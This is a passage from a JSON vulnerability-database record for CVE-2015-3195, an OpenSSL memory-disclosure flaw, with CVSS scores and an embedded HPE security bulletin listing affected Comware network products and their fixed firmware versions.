"integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "Low", "baseScore": 5.3, "baseSeverity": "Medium", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-3195", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2015-3195", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2015-07950", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201512-075", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-81156", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-3195", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2015-07950" }, { "db": "VULHUB", "id": "VHN-81156" }, { "db": "VULMON", "id": "CVE-2015-3195" }, { "db": "JVNDB", "id": "JVNDB-2015-006116" }, { "db": "CNNVD", "id": "CNNVD-201512-075" }, { "db": "NVD", "id": "CVE-2015-3195" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The ASN1_TFLG_COMBINE implementation in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zh, 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1q, and 1.0.2 before 1.0.2e mishandles errors caused by malformed X509_ATTRIBUTE data, which allows remote attackers to obtain sensitive information from process memory by triggering a decoding failure in a PKCS#7 or CMS application. OpenSSL is an open source SSL implementation used to implement high-strength encryption of network communications. \n\nOpenSSL\u0027s handling of X509_ATTRIBUTE has a security vulnerability. A remote attacker can use the vulnerability to send a message containing a special X509_ATTRIBUTE structure to trigger a memory leak. The attacker can obtain sensitive information. It supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, security hashing algorithm, etc. The vulnerability is due to the error caused by the program not correctly handling the malformed X509_ATTRIBUTE data. The following versions are affected: OpenSSL prior to 0.9.8zh, 1.0.0 prior to 1.0.0t, 1.0.1 prior to 1.0.1q, 1.0.2 prior to 1.0.2e. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05398322\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05398322\nVersion: 1\n\nHPESBHF03709 rev.1 - HPE Network products including Comware, IMC, and VCX\nrunning OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive\nInformation\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-02-21\nLast Updated: 2017-02-21\n\nPotential Security Impact: Remote: Denial of Service (DoS), Disclosure of\nSensitive Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities with OpenSSL have been addressed for HPE\nNetwork products including Comware 5, Comware 7, IMC, and VCX. The\nvulnerabilities could be remotely exploited resulting in Denial of Service\n(DoS) or disclosure of sensitive information. \n\nReferences:\n\n - CVE-2015-1794 - Remote Denial of Service (DoS)\n - CVE-2015-3193 - Remote disclosure of sensitive information\n - CVE-2015-3194 - Remote Denial of Service (DoS)\n - CVE-2015-3195 - Remote disclosure of sensitive information\n - CVE-2015-3196 - Remote Denial of Service (DoS)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - Comware 5 (CW5) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n - Comware 7 (CW7) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n - HPE Intelligent Management Center (iMC) All versions - Please refer to\nthe RESOLUTION below for a list of updated products. \n - VCX Products All versions - Please refer to the RESOLUTION below for a\nlist of updated products. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2015-1794\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2015-3193\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n CVE-2015-3194\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2015-3195\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2015-3196\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following software updates to resolve the vulnerabilities in\nthe Comware, IMC and VCX products running OpenSSL. \n\n\n**COMWARE 5 Products**\n\n + **A6600 (Comware 5) - Version: R3303P28**\n * HP Network Products\n - JC165A HP 6600 RPE-X1 Router Module\n - JC177A HP 6608 Router\n - JC177B HP 6608 Router Chassis\n - JC178A HP 6604 Router Chassis\n - JC178B HP 6604 Router Chassis\n - JC496A HP 6616 Router Chassis\n - JC566A HP 6600 RSE-X1 Router Main Processing Unit\n - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit\n - JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit\n + **HSR6602 (Comware 5) - Version: R3303P28**\n * HP Network Products\n - JC176A HP 6602 Router Chassis\n - JG353A HP HSR6602-G Router\n - JG354A HP HSR6602-XG Router\n - JG355A HP 6600 MCP-X1 Router Main Processing Unit\n - JG356A HP 6600 MCP-X2 Router Main Processing Unit\n - JG776A HP HSR6602-G TAA-compliant Router\n - JG777A HP HSR6602-XG TAA-compliant Router\n - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit\n + **HSR6800 (Comware 5) - Version: R3303P28**\n * HP Network Products\n - JG361A HP HSR6802 Router Chassis\n - JG361B HP HSR6802 Router Chassis\n - JG362A HP HSR6804 Router Chassis\n - JG362B HP HSR6804 Router Chassis\n - JG363A HP HSR6808 Router Chassis\n - JG363B HP HSR6808 Router Chassis\n - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n + **MSR20 (Comware 5) - Version: R2516**\n * HP Network Products\n - JD432A HP A-MSR20-21 Router\n - JD662A HP MSR20-20 Router\n - JD663A HP A-MSR20-21 Router\n - JD663B HP MSR20-21 Router\n - JD664A HP MSR20-40 Router\n - JF228A HP MSR20-40 Router\n - JF283A HP MSR20-20 Router\n + **MSR20-1X (Comware 5) - Version: R2516**\n * HP Network Products\n - JD431A HP MSR20-10 Router\n - JD667A HP MSR20-15 IW Multi-Service Router\n - JD668A HP MSR20-13 Multi-Service Router\n - JD669A HP MSR20-13 W Multi-Service Router\n - JD670A HP MSR20-15 A Multi-Service Router\n - JD671A HP MSR20-15 AW Multi-Service Router\n - JD672A HP MSR20-15 I Multi-Service Router\n - JD673A HP MSR20-11 Multi-Service Router\n - JD674A HP MSR20-12 Multi-Service Router\n - JD675A HP MSR20-12 W Multi-Service Router\n - JD676A HP MSR20-12 T1 Multi-Service Router\n - JF236A HP MSR20-15-I Router\n - JF237A HP MSR20-15-A Router\n - JF238A HP MSR20-15-I-W Router\n - JF239A HP MSR20-11 Router\n - JF240A HP MSR20-13 Router\n - JF241A HP MSR20-12 Router\n - JF806A HP MSR20-12-T Router\n - JF807A HP MSR20-12-W Router\n - JF808A HP MSR20-13-W Router\n - JF809A HP MSR20-15-A-W Router\n - JF817A HP MSR20-15 Router\n - JG209A HP MSR20-12-T-W Router (NA)\n - JG210A HP MSR20-13-W Router (NA)\n + **MSR 30 (Comware 5) - Version: R2516**\n * HP Network Products\n - JD654A HP MSR30-60 POE Multi-Service Router\n - JD657A HP MSR30-40 Multi-Service Router\n - JD658A HP MSR30-60 Multi-Service Router\n - JD660A HP MSR30-20 POE Multi-Service Router\n - JD661A HP MSR30-40 POE Multi-Service Router\n - JD666A HP MSR30-20 Multi-Service Router\n - JF229A HP MSR30-40 Router\n - JF230A HP MSR30-60 Router\n - JF232A HP RTMSR3040-AC-OVSAS-H3\n - JF235A HP MSR30-20 DC Router\n - JF284A HP MSR30-20 Router\n - JF287A HP MSR30-40 DC Router\n - JF801A HP MSR30-60 DC Router\n - JF802A HP MSR30-20 PoE Router\n - JF803A HP MSR30-40 PoE Router\n - JF804A HP MSR30-60 PoE Router\n - JG728A HP MSR30-20 TAA-compliant DC Router\n - JG729A HP MSR30-20 TAA-compliant Router\n + **MSR 30-16 (Comware 5) - Version: R2516**\n * HP Network Products\n - JD659A HP MSR30-16 POE Multi-Service Router\n - JD665A HP MSR30-16 Multi-Service Router\n - JF233A HP MSR30-16 Router\n - JF234A HP MSR30-16 PoE Router\n + **MSR 30-1X (Comware 5) - Version: R2516**\n * HP Network Products\n - JF800A HP MSR30-11 Router\n - JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\n - JG182A HP MSR30-11E Router\n - JG183A HP MSR30-11F Router\n - JG184A HP MSR30-10 DC Router\n + **MSR 50 (Comware 5) - Version: R2516**\n * HP Network Products\n - JD433A HP MSR50-40 Router\n - JD653A HP MSR50 Processor Module\n - JD655A HP MSR50-40 Multi-Service Router\n - JD656A HP MSR50-60 Multi-Service Router\n - JF231A HP MSR50-60 Router\n - JF285A HP MSR50-40 DC Router\n - JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n + **MSR 50-G2 (Comware 5) - Version: R2516**\n * HP Network Products\n - JD429A HP MSR50 G2 Processor Module\n - JD429B HP MSR50 G2 Processor Module\n + **MSR 9XX (Comware 5) - Version: R2516**\n * HP Network Products\n - JF812A HP MSR900 Router\n - JF813A HP MSR920 Router\n - JF814A HP MSR900-W Router\n - JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr\n - JG207A HP MSR900-W Router (NA)\n - JG208A HP MSR920-W Router (NA)\n + **MSR 93X (Comware 5) - Version: R2516**\n * HP Network Products\n - JG511A HP MSR930 Router\n - JG511B HP MSR930 Router\n - JG512A HP MSR930 Wireless Router\n - JG513A HP MSR930 3G Router\n - JG513B HP MSR930 3G Router\n - JG514A HP MSR931 Router\n - JG514B HP MSR931 Router\n - JG515A HP MSR931 3G Router\n - JG516A HP MSR933 Router\n - JG517A HP MSR933 3G Router\n - JG518A HP MSR935 Router\n - JG518B HP MSR935 Router\n - JG519A HP MSR935 Wireless Router\n - JG520A HP MSR935 3G Router\n - JG531A HP MSR931 Dual 3G Router\n - JG531B HP MSR931 Dual 3G Router\n - JG596A HP MSR930 4G LTE/3G CDMA Router\n - JG597A HP MSR936 Wireless Router\n - JG665A HP MSR930 4G LTE/3G WCDMA Global Router\n - JG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n - JH009A HP MSR931 Serial (TI) Router\n - JH010A HP MSR933 G.SHDSL (TI) Router\n - JH011A HP MSR935 ADSL2+ (TI) Router\n - JH012A HP MSR930 Wireless 802.11n (NA) Router\n - JH012B HP MSR930 Wireless 802.11n (NA) Router\n - JH013A HP MSR935 Wireless 802.11n (NA) Router\n + **MSR1000 (Comware 5) - Version: See Mitigation**\n * HP Network Products\n - JG732A HP MSR1003-8 AC Router\n + **12500 (Comware 5) - Version: R1829P02**\n * HP Network Products\n - JC072B HP 12500 Main Processing Unit\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JC808A HP 12500 TAA Main Processing Unit\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n + **9500E (Comware 5) - Version: R1829P02**\n * HP Network Products\n - JC124A HP A9508 Switch Chassis\n - JC124B HP 9505 Switch Chassis\n - JC125A HP A9512 Switch Chassis\n - JC125B HP 9512 Switch Chassis\n - JC474A HP A9508-V Switch Chassis\n - JC474B HP 9508-V Switch Chassis\n + **10500 (Comware 5) - Version: R1210P02**\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC614A HP 10500 Main Processing Unit\n - JC748A HP 10512 Switch Chassis\n - JG375A HP 10500 TAA-compliant Main Processing Unit\n - JG820A HP 10504 TAA-compliant Switch Chassis\n - JG821A HP 10508 TAA-compliant Switch Chassis\n - JG822A HP 10508-V TAA-compliant Switch Chassis\n - JG823A HP 10512 TAA-compliant Switch Chassis\n + **7500 (Comware 5) - Version: R6710P02**\n * HP Network Products\n - JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port\nGig-T/4-port GbE Combo\n - JC697A HP 7502 TAA-compliant Main Processing Unit\n - JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8\nGbE Combo Ports\n - JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP\nPorts\n - JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit\n - JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit\n - JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports\n - JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports\n - JD194A HP 7500 384Gbps Fabric Module\n - JD194B HP 7500 384Gbps Fabric Module\n - JD195A HP 7500 384Gbps Advanced Fabric Module\n - JD196A HP 7502 Fabric Module\n - JD220A HP 7500 768Gbps Fabric Module\n - JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports\n - JD238A HP 7510 Switch Chassis\n - JD238B HP 7510 Switch Chassis\n - JD239A HP 7506 Switch Chassis\n - JD239B HP 7506 Switch Chassis\n - JD240A HP 7503 Switch Chassis\n - JD240B HP 7503 Switch Chassis\n - JD241A HP 7506-V Switch Chassis\n - JD241B HP 7506-V Switch Chassis\n - JD242A HP 7502 Switch Chassis\n - JD242B HP 7502 Switch Chassis\n - JD243A HP 7503-S Switch Chassis with 1 Fabric Slot\n - JD243B HP 7503-S Switch Chassis with 1 Fabric Slot\n - JE164A HP E7902 Switch Chassis\n - JE165A HP E7903 Switch Chassis\n - JE166A HP E7903 1 Fabric Slot Switch Chassis\n - JE167A HP E7906 Switch Chassis\n - JE168A HP E7906 Vertical Switch Chassis\n - JE169A HP E7910 Switch Chassis\n + **6125G/XG Blade Switch - Version: R2112P05**\n * HP Network Products\n - 737220-B21 HP 6125G Blade Switch with TAA\n - 737226-B21 HP 6125G/XG Blade Switch with TAA\n - 658250-B21 HP 6125G/XG Blade Switch Opt Kit\n - 658247-B21 HP 6125G Blade Switch Opt Kit\n + **5830 (Comware 5) - Version: R1118P13**\n * HP Network Products\n - JC691A HP 5830AF-48G Switch with 1 Interface Slot\n - JC694A HP 5830AF-96G Switch\n - JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot\n - JG374A HP 5830AF-96G TAA-compliant Switch\n + **5800 (Comware 5) - Version: R1810P03**\n * HP Network Products\n - JC099A HP 5800-24G-PoE Switch\n - JC099B HP 5800-24G-PoE+ Switch\n - JC100A HP 5800-24G Switch\n - JC100B HP 5800-24G Switch\n - JC101A HP 5800-48G Switch with 2 Slots\n - JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots\n - JC103A HP 5800-24G-SFP Switch\n - JC103B HP 5800-24G-SFP Switch with 1 Interface Slot\n - JC104A HP 5800-48G-PoE Switch\n - JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot\n - JC105A HP 5800-48G Switch\n - JC105B HP 5800-48G Switch with 1 Interface Slot\n - JG254A HP 5800-24G-PoE+ TAA-compliant Switch\n - JG254B HP 5800-24G-PoE+ TAA-compliant Switch\n - JG255A HP 5800-24G TAA-compliant Switch\n - JG255B HP 5800-24G TAA-compliant Switch\n - JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot\n - JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot\n - JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot\n - JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot\n - JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n - JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n - JG225A HP 5800AF-48G Switch\n - JG225B HP 5800AF-48G Switch\n - JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots\n - JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface\n - JG243A HP 5820-24XG-SFP+ TAA-compliant Switch\n - JG243B HP 5820-24XG-SFP+ TAA-compliant Switch\n - JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\n\u0026 1 OAA Slot\n - JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\nand 1 OAA Slot\n - JC106A HP 5820-14XG-SFP+ Switch with 2 Slots\n - JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots \u0026 1 OAA Slot\n - JG219A HP 5820AF-24XG Switch\n - JG219B HP 5820AF-24XG Switch\n - JC102A HP 5820-24XG-SFP+ Switch\n - JC102B HP 5820-24XG-SFP+ Switch\n + **5500 HI (Comware 5) - Version: R5501P21**\n * HP Network Products\n - JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots\n - JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots\n - JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots\n - JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots\n - JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots\n - JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface\nSlots\n - JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface\nSlots\n - JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots\n + **5500 EI (Comware 5) - Version: R2221P22**\n * HP Network Products\n - JD373A HP 5500-24G DC EI Switch\n - JD374A HP 5500-24G-SFP EI Switch\n - JD375A HP 5500-48G EI Switch\n - JD376A HP 5500-48G-PoE EI Switch\n - JD377A HP 5500-24G EI Switch\n - JD378A HP 5500-24G-PoE EI Switch\n - JD379A HP 5500-24G-SFP DC EI Switch\n - JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots\n - JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots\n - JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface\n - JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots\n - JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots\n - JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface\nSlots\n - JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface\nSlots\n + **4800G (Comware 5) - Version: R2221P22**\n * HP Network Products\n - JD007A HP 4800-24G Switch\n - JD008A HP 4800-24G-PoE Switch\n - JD009A HP 4800-24G-SFP Switch\n - JD010A HP 4800-48G Switch\n - JD011A HP 4800-48G-PoE Switch\n + **5500SI (Comware 5) - Version: R2221P22**\n * HP Network Products\n - JD369A HP 5500-24G SI Switch\n - JD370A HP 5500-48G SI Switch\n - JD371A HP 5500-24G-PoE SI Switch\n - JD372A HP 5500-48G-PoE SI Switch\n - JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots\n - JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots\n + **4500G (Comware 5) - Version: R2221P22**\n * HP Network Products\n - JF428A HP 4510-48G Switch\n - JF847A HP 4510-24G Switch\n + **5120 EI (Comware 5) - Version: R2221P22**\n * HP Network Products\n - JE066A HP 5120-24G EI Switch\n - JE067A HP 5120-48G EI Switch\n - JE068A HP 5120-24G EI Switch with 2 Interface Slots\n - JE069A HP 5120-48G EI Switch with 2 Interface Slots\n - JE070A HP 5120-24G-PoE EI 2-slot Switch\n - JE071A HP 5120-48G-PoE EI 2-slot Switch\n - JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots\n - JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots\n - JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots\n - JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots\n - JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots\n - JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots\n + **4210G (Comware 5) - Version: R2221P22**\n * HP Network Products\n - JF844A HP 4210-24G Switch\n - JF845A HP 4210-48G Switch\n - JF846A HP 4210-24G-PoE Switch\n + **5120 SI (Comware 5) - Version: R1517**\n * HP Network Products\n - JE072A HP 5120-48G SI Switch\n - JE072B HPE 5120 48G SI Switch\n - JE073A HP 5120-16G SI Switch\n - JE073B HPE 5120 16G SI Switch\n - JE074A HP 5120-24G SI Switch\n - JE074B HPE 5120 24G SI Switch\n - JG091A HP 5120-24G-PoE+ (370W) SI Switch\n - JG091B HPE 5120 24G PoE+ (370W) SI Switch\n - JG092A HP 5120-24G-PoE+ (170W) SI Switch\n - JG309B HPE 5120 8G PoE+ (180W) SI Switch\n - JG310B HPE 5120 8G PoE+ (65W) SI Switch\n + **3610 (Comware 5) - Version: R5319P15**\n * HP Network Products\n - JD335A HP 3610-48 Switch\n - JD336A HP 3610-24-4G-SFP Switch\n - JD337A HP 3610-24-2G-2G-SFP Switch\n - JD338A HP 3610-24-SFP Switch\n + **3600V2 (Comware 5) - Version: R2111P01**\n * HP Network Products\n - JG299A HP 3600-24 v2 EI Switch\n - JG299B HP 3600-24 v2 EI Switch\n - JG300A HP 3600-48 v2 EI Switch\n - JG300B HP 3600-48 v2 EI Switch\n - JG301A HP 3600-24-PoE+ v2 EI Switch\n - JG301B HP 3600-24-PoE+ v2 EI Switch\n - JG301C HP 3600-24-PoE+ v2 EI Switch\n - JG302A HP 3600-48-PoE+ v2 EI Switch\n - JG302B HP 3600-48-PoE+ v2 EI Switch\n - JG302C HP 3600-48-PoE+ v2 EI Switch\n - JG303A HP 3600-24-SFP v2 EI Switch\n - JG303B HP 3600-24-SFP v2 EI Switch\n - JG304A HP 3600-24 v2 SI Switch\n - JG304B HP 3600-24 v2 SI Switch\n - JG305A HP 3600-48 v2 SI Switch\n - JG305B HP 3600-48 v2 SI Switch\n - JG306A HP 3600-24-PoE+ v2 SI Switch\n - JG306B HP 3600-24-PoE+ v2 SI Switch\n - JG306C HP 3600-24-PoE+ v2 SI Switch\n - JG307A HP 3600-48-PoE+ v2 SI Switch\n - JG307B HP 3600-48-PoE+ v2 SI Switch\n - JG307C HP 3600-48-PoE+ v2 SI Switch\n + **3100V2 (Comware 5) - Version: R5213P01**\n * HP Network Products\n - JD313B HPE 3100 24 PoE v2 EI Switch\n - JD318B HPE 3100 8 v2 EI Switch\n - JD319B HPE 3100 16 v2 EI Switch\n - JD320B HPE 3100 24 v2 EI Switch\n - JG221A HPE 3100 8 v2 SI Switch\n - JG222A HPE 3100 16 v2 SI Switch\n - JG223A HPE 3100 24 v2 SI Switch\n + **HP870 (Comware 5) - Version: R2607P51**\n * HP Network Products\n - JG723A HP 870 Unified Wired-WLAN Appliance\n - JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance\n + **HP850 (Comware 5) - Version: R2607P51**\n * HP Network Products\n - JG722A HP 850 Unified Wired-WLAN Appliance\n - JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance\n + **HP830 (Comware 5) - Version: R3507P51**\n * HP Network Products\n - JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch\n - JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch\n - JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch\n - JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant\n + **HP6000 (Comware 5) - Version: R2507P44**\n * HP Network Products\n - JG639A HP 10500/7500 20G Unified Wired-WLAN Module\n - JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module\n + **WX5004-EI (Comware 5) - Version: R2507P44**\n * HP Network Products\n - JD447B HP WX5002 Access Controller\n - JD448A HP WX5004 Access Controller\n - JD448B HP WX5004 Access Controller\n - JD469A HP WX5004 Access Controller\n + **SecBlade FW (Comware 5) - Version: R3181P07**\n * HP Network Products\n - JC635A HP 12500 VPN Firewall Module\n - JD245A HP 9500 VPN Firewall Module\n - JD249A HP 10500/7500 Advanced VPN Firewall Module\n - JD250A HP 6600 Firewall Processing Router Module\n - JD251A HP 8800 Firewall Processing Module\n - JD255A HP 5820 VPN Firewall Module\n + **F1000-E (Comware 5) - Version: TBD still fixing**\n * HP Network Products\n - JD272A HP F1000-E VPN Firewall Appliance\n + **F1000-A-EI (Comware 5) - Version: TBD still fixing**\n * HP Network Products\n - JG214A HP F1000-A-EI VPN Firewall Appliance\n + **F1000-S-EI (Comware 5) - Version: TBD still fixing**\n * HP Network Products\n - JG213A HP F1000-S-EI VPN Firewall Appliance\n + **F5000-A (Comware 5) - Version: F3210P26**\n * HP Network Products\n - JD259A HP A5000-A5 VPN Firewall Chassis\n - JG215A HP F5000 Firewall Main Processing Unit\n - JG216A HP F5000 Firewall Standalone Chassis\n + **U200S and CS (Comware 5) - Version: F5123P33**\n * HP Network Products\n - JD273A HP U200-S UTM Appliance\n + **U200A and M (Comware 5) - Version: F5123P33**\n * HP Network Products\n - JD275A HP U200-A UTM Appliance\n + **F5000-C/S (Comware 5) - Version: TBD still fixing**\n * HP Network Products\n - JG650A HP F5000-C VPN Firewall Appliance\n - JG370A HP F5000-S VPN Firewall Appliance\n + **SecBlade III (Comware 5) - Version: TBD still fixing**\n * HP Network Products\n - JG371A HP 12500 20Gbps VPN Firewall Module\n - JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module\n + **6600 RSE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n * HP Network Products\n - JC177A HP 6608 Router\n - JC177B HP 6608 Router Chassis\n - JC178A HP 6604 Router Chassis\n - JC178B HP 6604 Router Chassis\n - JC496A HP 6616 Router Chassis\n - JC566A HP 6600 RSE-X1 Router Main Processing Unit\n - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit\n + **6600 RPE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n * HP Network Products\n - JC165A HP 6600 RPE-X1 Router Module\n - JC177A HP 6608 Router\n - JC177B HPE FlexNetwork 6608 Router Chassis\n - JC178A HPE FlexNetwork 6604 Router Chassis\n - JC178B HPE FlexNetwork 6604 Router Chassis\n - JC496A HPE FlexNetwork 6616 Router Chassis\n - JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit\n + **6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n * HP Network Products\n - JC176A HP 6602 Router Chassis\n + **HSR6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n * HP Network Products\n - JC177A HP 6608 Router\n - JC177B HP 6608 Router Chassis\n - JC178A HP 6604 Router Chassis\n - JC178B HP 6604 Router Chassis\n - JC496A HP 6616 Router Chassis\n - JG353A HP HSR6602-G Router\n - JG354A HP HSR6602-XG Router\n - JG355A HP 6600 MCP-X1 Router Main Processing Unit\n - JG356A HP 6600 MCP-X2 Router Main Processing Unit\n - JG776A HP HSR6602-G TAA-compliant Router\n - JG777A HP HSR6602-XG TAA-compliant Router\n - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit\n + **HSR6800 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n * HP Network Products\n - JG361A HP HSR6802 Router Chassis\n - JG361B HP HSR6802 Router Chassis\n - JG362A HP HSR6804 Router Chassis\n - JG362B HP HSR6804 Router Chassis\n - JG363A HP HSR6808 Router Chassis\n - JG363B HP HSR6808 Router Chassis\n - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n + **SMB1910 (Comware 5) - Version: R1113**\n * HP Network Products\n - JG540A HP 1910-48 Switch\n - JG539A HP 1910-24-PoE+ Switch\n - JG538A HP 1910-24 Switch\n - JG537A HP 1910-8 -PoE+ Switch\n - JG536A HP 1910-8 Switch\n + **SMB1920 (Comware 5) - Version: R1112**\n * HP Network Products\n - JG928A HP 1920-48G-PoE+ (370W) Switch\n - JG927A HP 1920-48G Switch\n - JG926A HP 1920-24G-PoE+ (370W) Switch\n - JG925A HP 1920-24G-PoE+ (180W) Switch\n - JG924A HP 1920-24G Switch\n - JG923A HP 1920-16G Switch\n - 